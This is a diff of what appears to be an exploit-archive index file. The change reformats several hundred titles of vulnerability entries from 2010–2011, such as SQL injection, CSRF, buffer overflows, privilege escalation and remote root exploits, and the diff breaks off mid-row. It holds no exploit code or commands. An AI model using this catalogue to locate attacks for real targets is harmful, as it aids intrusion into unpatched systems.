15560,platforms/php/webapps/15560.txt,"CLANSPHERE 2010.0 Final Multiple Vulnerabilities",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15561,platforms/php/webapps/15561.txt,"CompactCMS 1.4.1 - SQL Injection Vulnerability",2010-11-16,"High-Tech Bridge SA",php,webapps,0 15563,platforms/asp/webapps/15563.txt,"Sitefinity CMS (ASP.NET) Shell Upload Vulnerability",2010-11-17,Net.Edit0r,asp,webapps,0 -15564,platforms/php/webapps/15564.txt,"Front Accounting 2.3RC2 Multiple Persistent XSS Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps,0 -15565,platforms/php/webapps/15565.txt,"Front Accounting 2.3RC2 Multiple SQL Injection Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps,0 +15564,platforms/php/webapps/15564.txt,"Front Accounting 2.3RC2 - Multiple Persistent XSS Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps,0 +15565,platforms/php/webapps/15565.txt,"Front Accounting 2.3RC2 - Multiple SQL Injection Vulnerabilities",2010-11-17,"Juan Manuel Garcia",php,webapps,0 15566,platforms/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0 15567,platforms/php/webapps/15567.txt,"WebRCSdiff 0.9 - (viewver.php) Remote File Inclusion Vulnerability",2010-11-18,FL0RiX,php,webapps,0 15568,platforms/php/webapps/15568.py,"chCounter <= 3.1.3 - SQL Injection Vulnerability",2010-11-18,"Matias Fontanini",php,webapps,0 15569,platforms/windows/local/15569.rb,"MP3-Nator Buffer Overflow (SEH - DEP BYPASS)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0 15570,platforms/php/webapps/15570.php,"Mosets Tree 2.1.6 (Joomla) Template Overwrite CSRF",2010-11-18,jdc,php,webapps,0 -15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 +15571,platforms/php/webapps/15571.txt,"fozzcom shopping<= 7.94+8.04 - Multiple Vulnerabilities",2010-11-18,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 15572,platforms/php/webapps/15572.txt,"viart shop 4.0.5 - Multiple Vulnerabilities",2010-11-19,Ariko-Security,php,webapps,0 -15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 CSRF Vulnerability",2010-11-19,Or4nG.M4N,php,webapps,0 +15573,platforms/php/webapps/15573.html,"PHPGallery 1.1.0 - CSRF Vulnerability",2010-11-19,Or4nG.M4N,php,webapps,0 15574,platforms/php/webapps/15574.txt,"Arabian Youtube Script Blind SQL Injection Vulnerability",2010-11-19,R3d-D3V!L,php,webapps,0 15575,platforms/windows/local/15575.py,"Minishare 1.5.5 - BoF Vulnerability (users.txt) - EggHunter -",2010-11-19,0v3r,windows,local,0 -15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 CSRF Change Admin Password",2010-11-19,Or4nG.M4N,php,webapps,0 -15578,platforms/php/webapps/15578.txt,"DVD Rental Software SQL injection Vulnerability",2010-11-19,JaMbA,php,webapps,0 +15577,platforms/php/webapps/15577.html,"Plogger Gallery 1.0 - CSRF Change Admin Password",2010-11-19,Or4nG.M4N,php,webapps,0 +15578,platforms/php/webapps/15578.txt,"DVD Rental Software SQL Injection Vulnerability",2010-11-19,JaMbA,php,webapps,0 15580,platforms/windows/dos/15580.pl,"Native Instruments Traktor Pro 1.2.6 Stack-based Buffer Overflow Vulnerability",2010-11-20,LiquidWorm,windows,dos,0 15581,platforms/windows/dos/15581.txt,"Native Instruments Reaktor 5 Player 5.5.1 - Heap Memory Corruption Vulnerability",2010-11-20,LiquidWorm,windows,dos,0 15582,platforms/windows/dos/15582.pl,"Native Instruments Kontakt 4 Player NKI File Syntactic Analysis Buffer Overflow PoC",2010-11-20,LiquidWorm,windows,dos,0 @@ -13494,12 +13494,12 @@ id,file,description,date,author,platform,type,port 15585,platforms/php/webapps/15585.txt,"Joomla Component (com_jimtawl) Local File Inclusion Vulnerability",2010-11-20,Mask_magicianz,php,webapps,0 15588,platforms/php/webapps/15588.txt,"s-cms 2.5 - Multiple Vulnerabilities",2010-11-20,LordTittiS,php,webapps,0 15589,platforms/windows/local/15589.wsf,"Windows Task Scheduler - Privilege Escalation (0day)",2010-11-20,webDEViL,windows,local,0 -15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0 +15590,platforms/php/webapps/15590.txt,"vBulletin 4.0.8 PL1 - XSS Filter Bypass within Profile Customization",2010-11-20,MaXe,php,webapps,0 15592,platforms/php/webapps/15592.txt,"sahitya graphics cms Multiple Vulnerabilities",2010-11-21,"Dr.0rYX AND Cr3W-DZ",php,webapps,0 -15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross Site Request Forgery exploit",2010-11-21,"Mon7rF .",php,webapps,0 -15594,platforms/php/webapps/15594.txt,"AuraCMS (pfd.php) SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 +15593,platforms/php/webapps/15593.html,"Cpanel 11.x - Edit E-mail Cross Site Request Forgery Exploit",2010-11-21,"Mon7rF .",php,webapps,0 +15594,platforms/php/webapps/15594.txt,"AuraCMS - (pfd.php) SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 15595,platforms/php/webapps/15595.txt,"jSchool Advanced Blind SQL Injection Vulnerability",2010-11-22,"Don Tukulesto",php,webapps,0 -15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 file download vulnerability",2010-11-22,Beach,jsp,webapps,0 +15596,platforms/jsp/webapps/15596.txt,"JCMS 2010 file download Vulnerability",2010-11-22,Beach,jsp,webapps,0 15597,platforms/asp/webapps/15597.txt,"Acidcat CMS 3.3 - (fckeditor) Shell Upload Vulnerability",2010-11-22,Net.Edit0r,asp,webapps,0 15598,platforms/windows/dos/15598.pl,"Xion Audio Player 1.0.126 (.m3u8) Buffer Overflow Vulnerability",2010-11-23,anT!-Tr0J4n,windows,dos,0 15599,platforms/windows/local/15599.py,"Xion Audio Player 1.0.127 - (m3u) Buffer Overflow Vulnerability",2010-11-23,0v3r,windows,local,0 @@ -13510,7 +13510,7 @@ id,file,description,date,author,platform,type,port 15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0 15607,platforms/php/webapps/15607.txt,"WSN Links SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0 15608,platforms/php/webapps/15608.txt,"Free Simple Software SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0 -15609,platforms/windows/local/15609.txt,"Elevation of privileges under Windows Vista/7 (UAC Bypass) 0day",2010-11-24,noobpwnftw,windows,local,0 +15609,platforms/windows/local/15609.txt,"Windows Vista/7 - Elevation of Privileges (UAC Bypass) (0day)",2010-11-24,noobpwnftw,windows,local,0 15610,platforms/php/webapps/15610.txt,"Joomla JE Ajax Event Calendar Component (com_jeajaxeventcalendar) SQL Injection",2010-11-25,"ALTBTA ",php,webapps,0 15611,platforms/multiple/webapps/15611.txt,"JDownloader Webinterface Source Code Disclosure Vulnerability",2010-11-25,Sil3nt_Dre4m,multiple,webapps,0 15612,platforms/php/webapps/15612.txt,"SiteEngine <= 7.1 - SQL Injection Vulnerability",2010-11-25,Beach,php,webapps,0 @@ -13534,16 +13534,16 @@ id,file,description,date,author,platform,type,port 15630,platforms/windows/local/15630.py,"Mediacoder 0.7.5.4792 - Buffer Overflow Exploit (SEH)",2010-11-29,0v3r,windows,local,0 15631,platforms/hardware/remote/15631.txt,"HP LaserJet Directory Traversal in PJL Interface",2010-11-29,"n.runs AG",hardware,remote,0 15632,platforms/windows/dos/15632.py,"FoxPlayer 2.4.0 - Denial of Service",2010-11-29,"Oh Yaw Theng",windows,dos,0 -15633,platforms/php/webapps/15633.html,"Diferior 8.03 Multiple XSS Vulnerabilities",2010-11-29,"High-Tech Bridge SA",php,webapps,0 +15633,platforms/php/webapps/15633.html,"Diferior 8.03 - Multiple XSS Vulnerabilities",2010-11-29,"High-Tech Bridge SA",php,webapps,0 15635,platforms/windows/dos/15635.py,"Provj 5.1.5.5 (m3u) Buffer Overflow Vulnerability PoC",2010-11-30,0v3r,windows,dos,0 15636,platforms/php/webapps/15636.txt,"Orbis CMS 1.0.2 - Arbitrary File Upload Vulnerability",2010-11-30,"Mark Stanislav",php,webapps,0 15637,platforms/php/webapps/15637.txt,"Link Protect 1.2 Persistent XSS Vulnerabilities",2010-11-30,"Shichemt Alen",php,webapps,0 15638,platforms/php/webapps/15638.txt,"Duhok Forum <= 1.1 - Remote File Upload Vulnerability",2010-11-30,BrOx-Dz,php,webapps,0 -15639,platforms/php/webapps/15639.txt,"Pandora FMS <= 3.1 Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15640,platforms/php/webapps/15640.txt,"Pandora FMS <= 3.1 OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15641,platforms/php/webapps/15641.txt,"Pandora FMS <= 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15642,platforms/php/webapps/15642.txt,"Pandora FMS <= 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 -15643,platforms/php/webapps/15643.txt,"Pandora FMS <= 3.1 Path Traversal and LFI",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15639,platforms/php/webapps/15639.txt,"Pandora Fms <= 3.1 Authentication Bypass",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15640,platforms/php/webapps/15640.txt,"Pandora Fms <= 3.1 OS Command Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15641,platforms/php/webapps/15641.txt,"Pandora Fms <= 3.1 - SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15642,platforms/php/webapps/15642.txt,"Pandora Fms <= 3.1 - Blind SQL Injection",2010-11-30,"Juan Galiana Lara",php,webapps,0 +15643,platforms/php/webapps/15643.txt,"Pandora Fms <= 3.1 Path Traversal and LFI",2010-11-30,"Juan Galiana Lara",php,webapps,0 15644,platforms/php/webapps/15644.txt,"Eclime 1.1.2b Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15645,platforms/php/webapps/15645.txt,"enano cms 1.1.7pl1 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 15646,platforms/php/webapps/15646.txt,"DynPG 4.2.0 - Multiple Vulnerabilities",2010-11-30,"High-Tech Bridge SA",php,webapps,0 @@ -13558,7 +13558,7 @@ id,file,description,date,author,platform,type,port 15656,platforms/php/webapps/15656.txt,"LittlePhpGallery 1.0.2 - Local File Inclusion",2010-12-01,"kire bozorge khavarmian",php,webapps,0 15657,platforms/windows/dos/15657.txt,"FreeTrim MP3 2.2.3 - Denial of Service Vulnerability",2010-12-02,h1ch4m,windows,dos,0 15658,platforms/windows/remote/15658.rb,"Image Viewer CP Gold 5.5 - Image2PDF() Buffer Overflow (msf)",2010-12-02,bz1p,windows,remote,0 -15659,platforms/php/webapps/15659.txt,"Contenido CMS 4.8.12 XSS Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 +15659,platforms/php/webapps/15659.txt,"Contenido CMS 4.8.12 - XSS Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15660,platforms/php/webapps/15660.txt,"etomite 1.1 - Multiple Vulnerabilities",2010-12-02,"High-Tech Bridge SA",php,webapps,0 15661,platforms/asp/webapps/15661.txt,"Ananda Real Estate 3.4 (list.asp) Multiple SQL Injection",2010-12-02,underground-stockholm.com,asp,webapps,0 15662,platforms/linux/remote/15662.txt,"ProFTPD 1.3.3c - Compromised Source Remote Root Trojan",2010-12-02,anonymous,linux,remote,21 @@ -13581,12 +13581,12 @@ id,file,description,date,author,platform,type,port 15681,platforms/asp/webapps/15681.txt,"ASPSiteware JobPost 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15682,platforms/asp/webapps/15682.txt,"ASPSiteware ASP Gallery 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 15683,platforms/asp/webapps/15683.txt,"ASPSiteware Contact Directory 1.0 - SQL Injection",2010-12-04,R4dc0re,asp,webapps,0 -15684,platforms/php/webapps/15684.txt,"Wordpress do_trackbacks() function - SQL injection vulnerability",2010-12-05,M4g,php,webapps,0 +15684,platforms/php/webapps/15684.txt,"Wordpress do_trackbacks() function - SQL Injection Vulnerability",2010-12-05,M4g,php,webapps,0 15685,platforms/php/webapps/15685.html,"phpKF Forum 1.80 profil_degistir.php CSRF Exploit",2010-12-05,FreWaL,php,webapps,0 15686,platforms/asp/webapps/15686.txt,"Gatesoft Docusafe 4.1.0 - SQL Injection Vulnerability",2010-12-05,R4dc0re,asp,webapps,0 15687,platforms/asp/webapps/15687.txt,"Ecommercemax Solutions Digital Goods Seller SQL Injection",2010-12-05,R4dc0re,asp,webapps,0 15688,platforms/asp/webapps/15688.txt,"HotWebScripts HotWeb Rentals (resorts.asp) SQL injection",2010-12-05,R4dc0re,asp,webapps,0 -15689,platforms/windows/remote/15689.py,"Freefloat FTP Server Buffer Overflow Vulnerability 0day",2010-12-05,0v3r,windows,remote,0 +15689,platforms/windows/remote/15689.py,"Freefloat FTP Server - Buffer Overflow Vulnerability (0day)",2010-12-05,0v3r,windows,remote,0 15690,platforms/asp/webapps/15690.txt,"SOOP Portal 2.0 - Remote Upload Shell Vulnerability",2010-12-05,Net.Edit0r,asp,webapps,0 15691,platforms/php/webapps/15691.txt,"Pulse CMS Basic - Local File Inclusion Vulnerability",2010-12-05,"Mark Stanislav",php,webapps,0 15692,platforms/windows/local/15692.py,"Video Charge Studio <= 2.9.5.643 (.vsc) Buffer Overflow (SEH)",2010-12-06,"xsploited security",windows,local,0 @@ -13596,19 +13596,19 @@ id,file,description,date,author,platform,type,port 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution Exploit",2010-12-06,Rew,windows,local,0 15697,platforms/windows/dos/15697.html,"AVG Internet Security 2011 Safe Search for IE DoS",2010-12-06,Dr_IDE,windows,dos,0 15698,platforms/windows/dos/15698.html,"Flash Player (Flash6.ocx) AllowScriptAccess DoS PoC",2010-12-06,Dr_IDE,windows,dos,0 -15699,platforms/php/webapps/15699.txt,"PhpMyAdmin Client Side 0Day Code Injection and Redirect Link Falsification",2010-12-06,"emgent white_sheep and scox",php,webapps,80 -15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0 +15699,platforms/php/webapps/15699.txt,"PhpMyAdmin - Client Side Code Injection and Redirect Link Falsification (0day)",2010-12-06,"emgent white_sheep and scox",php,webapps,80 +15701,platforms/php/webapps/15701.txt,"MODx Revolution CMS 2.0.4-pl2 - Remote XSS POST Injection Vulnerability",2010-12-06,LiquidWorm,php,webapps,0 15703,platforms/asp/webapps/15703.txt,"SOOP Portal Raven 1.0b Shell Upload Vulnerability",2010-12-07,"Sun Army",asp,webapps,0 15704,platforms/linux/local/15704.c,"Linux Kernel <= 2.6.37 - Local Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 15705,platforms/linux/dos/15705.txt,"GNU inetutils 1.8-1 - FTP Client Heap Overflow",2010-12-07,Rew,linux,dos,0 15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 15707,platforms/multiple/dos/15707.txt,"Wonderware InBatch <= 9.0sp1 Buffer Overflow Vulnerability",2010-12-08,"Luigi Auriemma",multiple,dos,0 15708,platforms/windows/dos/15708.html,"Internet Explorer 8 CSS Parser Denial of Service",2010-12-08,WooYun,windows,dos,0 -15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 - 1.3.1 CSRF Vulnerability",2010-12-09,"Anatolia Security",multiple,webapps,0 +15710,platforms/multiple/webapps/15710.txt,"Apache Archiva 1.0 - 1.3.1 - CSRF Vulnerability",2010-12-09,"Anatolia Security",multiple,webapps,0 15711,platforms/php/webapps/15711.pl,"Abtp Portal Project 0.1.0 LFI Exploit",2010-12-09,Br0ly,php,webapps,0 15712,platforms/arm/shellcode/15712.rb,"Create a New User with UID 0 - ARM (Meta)",2010-12-09,"Jonathan Salwan",arm,shellcode,0 15714,platforms/php/webapps/15714.txt,"Joomla JE Auto Component 1.0 - SQL Injection Vulnerability",2010-12-09,"Salvatore Fresta",php,webapps,0 -15715,platforms/php/webapps/15715.txt,"CMScout 2.09 CSRF Vulnerability",2010-12-09,"High-Tech Bridge SA",php,webapps,0 +15715,platforms/php/webapps/15715.txt,"CMScout 2.09 - CSRF Vulnerability",2010-12-09,"High-Tech Bridge SA",php,webapps,0 15717,platforms/multiple/remote/15717.txt,"VMware Tools update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0 15718,platforms/php/webapps/15718.txt,"AJ Matrix DNA SQL Injection",2010-12-09,Br0ly,php,webapps,0 15719,platforms/php/webapps/15719.txt,"JE Messenger 1.0 - Arbitrary File Upload Vulnerability",2010-12-09,"Salvatore Fresta",php,webapps,0 @@ -13619,13 +13619,13 @@ id,file,description,date,author,platform,type,port 15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 .m3u Buffer Overflow",2010-12-11,zota,windows,local,0 15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0 -15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow 0day",2010-12-12,m_101,windows,local,0 +15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow (0day)",2010-12-12,m_101,windows,local,0 15730,platforms/windows/local/15730.rb,"SnackAmp 3.1.3 - SMP Buffer Overflow Vulnerability (SEH)",2010-12-12,"James Fitts",windows,local,0 15732,platforms/linux/dos/15732.txt,"FontForge .BDF Font File Stack-Based Buffer Overflow",2010-12-14,"Ulrik Persson",linux,dos,0 -15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - Activex Exploit (PrintControl.dll) 0day",2010-12-14,Dr_IDE,windows,remote,0 +15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - Activex Exploit (PrintControl.dll) (0day)",2010-12-14,Dr_IDE,windows,remote,0 15735,platforms/php/webapps/15735.txt,"MantisBT <= 1.2.3 (db_type) - Cross-Site Scripting & Path Disclosure Vulnerability",2010-12-15,LiquidWorm,php,webapps,0 15736,platforms/php/webapps/15736.txt,"MantisBT <= 1.2.3 (db_type) - Local File Inclusion Vulnerability",2010-12-15,LiquidWorm,php,webapps,0 -15737,platforms/cgi/webapps/15737.txt,"Google Urchin 5.7.03 LFI Vulnerability 0day",2010-12-15,"Kristian Erik Hermansen",cgi,webapps,0 +15737,platforms/cgi/webapps/15737.txt,"Google Urchin 5.7.03 - LFI Vulnerability (0day)",2010-12-15,"Kristian Erik Hermansen",cgi,webapps,0 15738,platforms/windows/dos/15738.pl,"Digital Audio Editor 7.6.0.237 Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 15739,platforms/windows/dos/15739.pl,"Easy DVD Creator Local Crash PoC",2010-12-15,h1ch4m,windows,dos,0 15740,platforms/php/webapps/15740.txt,"Pointter PHP Content Management System Unauthorized Privilege Escalation",2010-12-15,"Mark Stanislav",php,webapps,0 @@ -13655,12 +13655,12 @@ id,file,description,date,author,platform,type,port 15767,platforms/windows/dos/15767.py,"Ecava IntegraXor Remote ActiveX Buffer Overflow PoC",2010-12-18,"Jeremy Brown",windows,dos,0 15768,platforms/php/webapps/15768.txt,"MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload Vulnerability",2010-12-18,"Vladimir Vorontsov",php,webapps,0 15769,platforms/php/webapps/15769.txt,"Ero Auktion 2010 - (item.php) SQL Injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 -15770,platforms/php/webapps/15770.txt,"Download Center 2.2 - SQL injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 -15771,platforms/php/webapps/15771.txt,"SchuldnerBeratung SQL injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 +15770,platforms/php/webapps/15770.txt,"Download Center 2.2 - SQL Injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 +15771,platforms/php/webapps/15771.txt,"SchuldnerBeratung SQL Injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 15772,platforms/php/webapps/15772.txt,"PayPal Shop Digital SQL Injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 -15773,platforms/php/webapps/15773.txt,"Projekt Shop (details.php) Multiple SQL injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0 +15773,platforms/php/webapps/15773.txt,"Projekt Shop (details.php) Multiple SQL Injection Vulnerabilities",2010-12-18,"DeadLy DeMon",php,webapps,0 15774,platforms/linux/local/15774.c,"Linux Kernel < 2.6.37-rc2 - ACPI custom_method Privilege Escalation",2010-12-18,"Jon Oberheide",linux,local,0 -15775,platforms/php/webapps/15775.txt,"Mafia Game Script SQL injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 +15775,platforms/php/webapps/15775.txt,"Mafia Game Script SQL Injection Vulnerability",2010-12-18,"DeadLy DeMon",php,webapps,0 15776,platforms/asp/webapps/15776.pl,"Virtual Store Open 3.0 Acess SQL Injection",2010-12-18,Br0ly,asp,webapps,0 15777,platforms/asp/webapps/15777.txt,"Oto Galery 1.0 - Multiple SQL Injection Vulnerabilities",2010-12-19,"DeadLy DeMon",asp,webapps,0 15779,platforms/php/webapps/15779.txt,"Joomla JE Auto Component (com_jeauto) LFI Vulnerability",2010-12-19,Sid3^effects,php,webapps,0 @@ -13678,7 +13678,7 @@ id,file,description,date,author,platform,type,port 15792,platforms/hardware/dos/15792.php,"Apple iPhone Safari (body alink) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 15793,platforms/php/webapps/15793.txt,"Vacation Rental Script 4.0 - Arbitrary File Upload Vulnerability",2010-12-20,Br0ly,php,webapps,0 15794,platforms/hardware/dos/15794.php,"Apple iPhone Safari (decodeURI) Remote Crash",2010-12-20,"Yakir Wizman",hardware,dos,0 -15795,platforms/php/webapps/15795.txt,"Serendipity 1.5.4 0day Arbitrary File Upload Vulnerability",2010-12-21,pentesters.ir,php,webapps,0 +15795,platforms/php/webapps/15795.txt,"Serendipity 1.5.4 - Arbitrary File Upload Vulnerability (0day)",2010-12-21,pentesters.ir,php,webapps,0 15796,platforms/hardware/dos/15796.php,"Apple iPhone Safari (decodeURIComponent) Remote Crash",2010-12-21,"Yakir Wizman",hardware,dos,0 15797,platforms/php/webapps/15797.txt,"Hycus CMS Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 15798,platforms/php/webapps/15798.txt,"Injader CMS Multiple Vulnerabilities",2010-12-21,"High-Tech Bridge SA",php,webapps,0 @@ -13691,8 +13691,8 @@ id,file,description,date,author,platform,type,port 15805,platforms/hardware/dos/15805.php,"Apple iPhone Safari (JS .) Remote Crash",2010-12-22,"Yakir Wizman",hardware,dos,0 15806,platforms/linux/remote/15806.txt,"Citrix Access Gateway Command Injection Vulnerability",2010-12-22,"George D. Gal",linux,remote,0 15807,platforms/cgi/webapps/15807.txt,"Mitel AWC Unauthenticated Command Execution",2010-12-22,Procheckup,cgi,webapps,0 -15808,platforms/php/webapps/15808.txt,"WORDPRESS Plugin Accept Signups 0.1 XSS",2010-12-22,clshack,php,webapps,0 -15809,platforms/windows/remote/15809.html,"WMITools ActiveX Remote Command Execution Exploit 0day",2010-12-22,WooYun,windows,remote,0 +15808,platforms/php/webapps/15808.txt,"WORDPRESS Plugin Accept Signups 0.1 - XSS",2010-12-22,clshack,php,webapps,0 +15809,platforms/windows/remote/15809.html,"WMITools ActiveX - Remote Command Execution Exploit (0day)",2010-12-22,WooYun,windows,remote,0 15810,platforms/hardware/webapps/15810.txt,"D-Link WBR-1310 Authentication Bypass Vulnerability",2010-12-23,"Craig Heffner",hardware,webapps,0 15811,platforms/php/webapps/15811.txt,"Built2Go PHP Shopping SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0 15812,platforms/php/webapps/15812.txt,"Ypninc Realty Classifieds SQL Injection Vulnerability",2010-12-23,Br0ly,php,webapps,0 @@ -13700,20 +13700,20 @@ id,file,description,date,author,platform,type,port 15814,platforms/php/webapps/15814.txt,"Joomla Component com_ponygallery Remote File Inclusion Vulnerabilities",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 15815,platforms/php/webapps/15815.txt,"Joomla Component com_adsmanager Remote File Inclusion Vulnerability",2010-12-23,"AtT4CKxT3rR0r1ST ",php,webapps,0 15816,platforms/php/webapps/15816.txt,"CubeCart <= 3.0.4 - SQL Injection Vulnerability",2010-12-23,Dr.NeT,php,webapps,0 -15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 Multiple Local File Inclusion Vulnerabilities",2010-12-24,v3n0m,php,webapps,0 +15818,platforms/php/webapps/15818.txt,"iDevSpot iDevCart 1.10 - Multiple Local File Inclusion Vulnerabilities",2010-12-24,v3n0m,php,webapps,0 15819,platforms/php/webapps/15819.txt,"Joomla Component com_xmovie 1.0 - Local File Inclusion Vulnerability",2010-12-24,KelvinX,php,webapps,0 15820,platforms/php/webapps/15820.txt,"SquareCMS 0.3.1 (post.php) SQL Injection Vulnerability",2010-12-24,cOndemned,php,webapps,0 15821,platforms/windows/dos/15821.py,"HttpBlitz Web Server Denial of Service Exploit",2010-12-24,otoy,windows,dos,0 15822,platforms/php/webapps/15822.html,"CubeCart 3.0.6 - CSRF Vulnerability (Add Admin)",2010-12-24,"P0C T34M",php,webapps,0 15824,platforms/php/webapps/15824.txt,"Pligg 1.1.2 - Blind SQL Injection and XSS Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 15825,platforms/php/webapps/15825.txt,"openauto 1.6.3 - Multiple Vulnerabilities",2010-12-25,"Michael Brooks",php,webapps,0 -15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 CSRF Vulnerability",2010-12-25,"P0C T34M",php,webapps,0 +15826,platforms/php/webapps/15826.txt,"Traidnt Up 3.0 - CSRF Vulnerability",2010-12-25,"P0C T34M",php,webapps,0 15827,platforms/php/webapps/15827.txt,"Joomla Component (com_idoblog) SQL Injection Vulnerability",2010-12-25,NOCKAR1111,php,webapps,0 15828,platforms/php/webapps/15828.txt,"Vacation Rental Script 4.0 - CSRF Vulnerability",2010-12-25,OnurTURKESHAN,php,webapps,0 15830,platforms/php/webapps/15830.txt,"Social Engine 4.x (Music Plugin) Arbitrary File Upload Vulnerability",2010-12-25,MyDoom,php,webapps,0 15831,platforms/php/webapps/15831.txt,"LoveCMS 1.6.2 Final Multiple Local File Inclusion Vulnerabilities",2010-12-25,cOndemned,php,webapps,0 15832,platforms/php/webapps/15832.txt,"Interact 2.4.1 - SQL Injection Vulnerability",2010-12-26,"IR Security",php,webapps,0 -15834,platforms/windows/remote/15834.py,"Kolibri 2.0 - Buffer Overflow RET + SEH exploit (HEAD)",2010-12-26,TheLeader,windows,remote,0 +15834,platforms/windows/remote/15834.py,"Kolibri 2.0 - Buffer Overflow RET + SEH Exploit (HEAD)",2010-12-26,TheLeader,windows,remote,0 15835,platforms/php/webapps/15835.html,"pecio CMS 2.0.5 - CSRF Add Admin",2010-12-27,"P0C T34M",php,webapps,0 15836,platforms/php/webapps/15836.txt,"OpenEMR 3.2.0 - SQL Injection and XSS",2010-12-27,blake,php,webapps,0 15837,platforms/php/webapps/15837.txt,"Web@all <= 1.1 - Remote Admin Settings Change",2010-12-27,"Giuseppe D'Inverno",php,webapps,0 @@ -13769,10 +13769,10 @@ id,file,description,date,author,platform,type,port 15917,platforms/php/webapps/15917.txt,"Ignition 1.3 (comment.php) Local File Inclusion Vulnerability",2011-01-06,n0n0x,php,webapps,0 15918,platforms/jsp/webapps/15918.txt,"Openfire 3.6.4 - Multiple CSRF Vulnerabilities",2011-01-06,"Riyaz Ahemed Walikar",jsp,webapps,0 15919,platforms/windows/local/15919.pl,"Enzip 3.00 Buffer Overflow Exploit",2011-01-06,"C4SS!0 G0M3S",windows,local,0 -15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 Multiple Vulnerabilities (xss, csrf)",2011-01-06,"High-Tech Bridge SA",php,webapps,0 +15920,platforms/php/webapps/15920.txt,"F3Site 2011 alfa 1 - Multiple Vulnerabilities (xss, csrf)",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15921,platforms/php/webapps/15921.txt,"phpMySport 1.4 - Multiple Vulnerabilities (SQLi, Auth Bypass, Path Disclosure)",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15922,platforms/php/webapps/15922.txt,"Phenotype CMS 3.0 - SQL Injection",2011-01-06,"High-Tech Bridge SA",php,webapps,0 -15923,platforms/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 CSRF and XSS Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 +15923,platforms/php/webapps/15923.txt,"PHP MicroCMS 1.0.1 - CSRF and XSS Vulnerabilities",2011-01-06,"High-Tech Bridge SA",php,webapps,0 15924,platforms/php/webapps/15924.txt,"openSite 0.2.2 beta - Local File Inclusion 